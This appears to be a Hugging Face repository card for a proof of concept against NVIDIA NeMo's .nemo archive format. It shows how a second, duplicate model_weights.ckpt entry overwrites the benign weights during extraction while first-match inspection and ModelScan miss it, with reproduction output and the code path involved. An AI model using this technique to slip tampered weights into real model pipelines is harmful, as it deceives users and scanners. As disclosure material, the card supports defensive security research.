You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

NeMo .nemo duplicate archive member — reader differential PoC

Vulnerability class: Model File Vulnerability (MFV) — archive member last-write differential
Target: NeMo – NVIDIA
Tested format: .nemo (TAR archive)

Summary

A .nemo model file is a TAR archive containing model_config.yaml and model_weights.ckpt. If the archive contains two entries named model_weights.ckpt, NeMo's restore path extracts all members sequentially (SaveRestoreConnector._safe_extract), writing each to the same output path. The last member overwrites the first on disk. A simple archive inspection script that selects the first matching model_weights.ckpt member observes the benign checkpoint, while the runtime extraction path uses the later member written to disk — the attacker-controlled weights.

ModelScan 0.8.8 does not cover the .nemo format and reports SCAN_NOT_SUPPORTED with 0 issues for both the benign and crafted files.

Files

File	Description
`benign.nemo`	Reference model: single `model_weights.ckpt` entry, identity weights
`dup_weights_last.nemo`	Crafted model: two `model_weights.ckpt` entries — first is benign (identity), second is malicious (99× scale + offset)
`reproduce.py`	Verifies the reader differential and output manipulation
`requirements.txt`	Python dependencies

Reproduction

pip install -r requirements.txt
python reproduce.py

Expected output

NEMO_TAR_LAST_WRITE_WINS=True
FIRST_MATCH_SEES_BENIGN=True
EXTRACTED_FILE_IS_LAST=True
OUTPUT_FLIP_CONFIRMED=True
  first_match output  = [1.0, 2.0]  (benign, what first-match inspector sees)
  nemo_extract output = [198.0, 297.0]  (malicious, what sequential extraction writes)
  delta               = [197.0, 295.0]

MODELSCAN_RESULT=0 issues / SCAN_NOT_SUPPORTED

=== Archive member table (dup_weights_last.nemo) ===
  [0] model_config.yaml  (38 bytes)
  [1] model_weights.ckpt  (1829 bytes)
  [2] model_weights.ckpt  (1829 bytes)

=== Prediction table ===
Model                                Output
benign.nemo                      [1.0, 2.0]
dup_weights_last.nemo        [198.0, 297.0]  <- sequential extract, last wins

[PASS] All checks passed.

Mechanism

In dup_weights_last.nemo, the TAR archive contains two members named model_weights.ckpt:

Member [1] (index 0 among weight entries): benign identity weights {bias: [0, 0], scale: [1, 1]} — produces output [1.0, 2.0] for input [1, 2]
Member [2] (index 1 among weight entries): malicious 99× weights {bias: [99, 99], scale: [99, 99]} — produces output [198.0, 297.0] for the same input

NeMo's SaveRestoreConnector._safe_extract iterates tar.getmembers() in archive order and calls tar.extract(member, out_folder) for each member that passes the path-safety check. When two members share a name, the second call overwrites the file written by the first. The model is then loaded from os.path.join(tmpdir, 'model_weights.ckpt'), which now contains the attacker-supplied weights.

Source reference: nemo/core/connectors/save_restore_connector.py — _safe_extract, _unpack_nemo_file, load_config_and_state_dict
Permalink: https://github.com/NVIDIA/NeMo/blob/43707ab33d0b1b621dae87454fed9122a7022d28/nemo/core/connectors/save_restore_connector.py

Reader comparison

Reader	API	Resolution	Weights loaded
First-match archive inspection	`getmembers()` → first `model_weights.ckpt` entry	first match	identity (benign)
NeMo restore path (`_safe_extract`)	`tar.extract()` for each member in order	last write wins	99× scale (malicious)
ModelScan 0.8.8	`.scan()`	not scanned	0 issues (SCAN_NOT_SUPPORTED)

Downloads last month: 9

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support